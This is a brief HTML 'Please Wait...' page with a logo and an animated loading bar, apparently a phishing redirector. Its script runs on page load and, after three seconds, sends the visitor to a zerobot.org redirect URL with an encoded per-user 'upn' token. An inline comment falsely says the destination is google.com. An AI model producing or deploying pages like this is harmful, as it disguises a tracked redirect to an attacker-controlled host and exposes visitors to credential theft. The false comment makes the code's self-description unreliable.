<html lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Please Wait...</title>
    <style>
      body {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        height: 100vh;
        margin: 0;
        background-color: #f0f0f0;
      }

      .logo {
        margin-bottom: 30px;
        width: 80px;
        height: 80px;
      }

      .logo img {
        width: 100%;
        height: 100%;
      }

      .loading-bar {
        width: 300px;
        height: 4px;
        background-color: #e0e0e0;
        border-radius: 10px;
        overflow: hidden;
      }

      .progress {
        width: 50%;
        height: 100%;
        background-color: #00a4ef;
        animation: loading 1s infinite ease-in-out;
        transform-origin: left center;
      }

      @keyframes loading {
        0% {
          transform: translateX(-100%);
        }

        100% {
          transform: translateX(300%);
        }
      }
    </style>
  </head>

  <body>
    <div class="logo">
      <img src="./Please Wait..._files/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png" alt="logo">
    </div>
    <div class="loading-bar">
      <div class="progress"></div>
    </div>

    <!-- Redirect JavaScript -->
    <script>
      // Redirect to https://google.com after the page has loaded and logo is shown
      window.onload = function() {
        setTimeout(function() {
          window.location.href = 'https://redirect-539228367201725.zerobot.org/redirect?upn=b3ZRd0JYUE9vYXpOdEJUQw';
        }, 3000); // Redirect after 3 seconds
      };
    </script>
  </body>
</html>
